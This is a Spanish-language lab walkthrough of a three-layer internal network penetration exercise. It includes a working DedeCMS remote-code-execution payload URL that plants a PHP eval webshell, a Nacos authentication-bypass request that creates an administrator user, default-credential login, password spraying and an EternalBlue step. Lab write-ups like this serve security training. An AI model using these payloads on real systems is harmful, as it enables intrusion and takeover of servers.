Ejercicio de Penetración en Tres Capas de Red

Recolección de Información

Escaneo de Puertos Abiertos

Se utiliza nmap para identificar los servicios expuestos en el objetivo principal:

nmap -sT --min-rate 5000 192.168.111.20

Resultado del escaneo:

PORT    STATE SERVICE
25/tcp  open  smtp
110/tcp open  pop3
143/tcp open  imap

Adicionalmente se realiza un escaneo en el puerto 8080 donde se identifica un CMS específico.

Explotación del Primer Objetivo

Credenciales Débiles del Administrador

Se localizó el panel de administración y se identificó la versión del sistema. Las credenciales por defecto admin/admin permiten acceso exitoso al panel de gestión.

Ejecución Remota de Código en DedeCMS

Una vez autenticado, se exploita la vulnerabilidad de ejecución remota de código mediante el siguiente payload:

/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}system(whoami);{/dede:field}

El sistema operativo objetivo es Windows. Se procede a crear un archivo con código malicioso:

http://192.168.111.20:8080/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name='source'%20runphp='yes'}file_put_contents('cmd.php','<?php @eval($_POST["shell"]);?>');{/dede:field}

Se establece conexión mediante herramienta de administración remota.

Exploración de la Red Interna

Análisis del Segmento de Red

Escaneo del segmento 192.168.52.0/24

Se sube la herramienta fscan al servidor comprometido para descubrir activos en la red interna.

Resultados del escaneo:

[+] Puerto abierto 192.168.52.4:80
[+] Puerto abierto 192.168.52.4:22
[+] Puerto abierto 192.168.52.2:21
[+] Puerto abierto 192.168.52.2:445
[+] Puerto abierto 192.168.52.2:139
[+] Puerto abierto 192.168.52.2:135
[+] Puerto abierto 192.168.52.4:6379
[+] Puerto abierto 192.168.52.2:3306
[+] Puerto abierto 192.168.52.2:8080
[+] Puerto abierto 192.168.52.4:8848

[*] Título del sitio http://192.168.52.2:8080  Código:200  Título:Mi Sitio Web
[+] Huella digital detectada: DedeCMS
[+] Vulnerabilidad encontrada: nacos authentication bypass

Se establece una shell reversa para mantener persistencia en el primer objetivo.

Túnel y Proxy

Se configura el proxy para dirigir el tráfico a través del servidor comprometido, permitiendo el acceso a la red interna.

Explotación del Segundo Objetivo

Servicio Nacos

Se accede al servicio Nacos en el puerto 8848 para enumerar usuarios:

http://192.168.52.4:8848/nacos/v1/auth/users?pageNo=1&pageSize=100

Se crea un nuevo usuario mediante solicitud HTTP:

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.52.4:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=hacker&password=hack123

Las credenciales creadas permiten autenticación exitosa en el panel de Nacos.

Acceso a Servicios Internos

Se identifican los servicios Redis (puerto 6379) y SSH (puerto 22) durante el escaneo inicial. Se realiza un ataque de password spraying contra estos servicios.

Obtención de Shell

Se utiliza herramienta automatizada para aprovechar las vulneraiblidades del servicio. Se establece conexión y se sube un payload de conexión directa para completar la cadena de ataque.

Explotación del Tercer Objetivo

El escaneo con fscan en este segmento revela la vulnerabilidad MS17-010 (EternalBlue). Se utiliza el toolkit de explotación conocido como IMPETUS para aprovechar esta vulnerabilidad crítica y obtener acceso al tercer nivel de la red.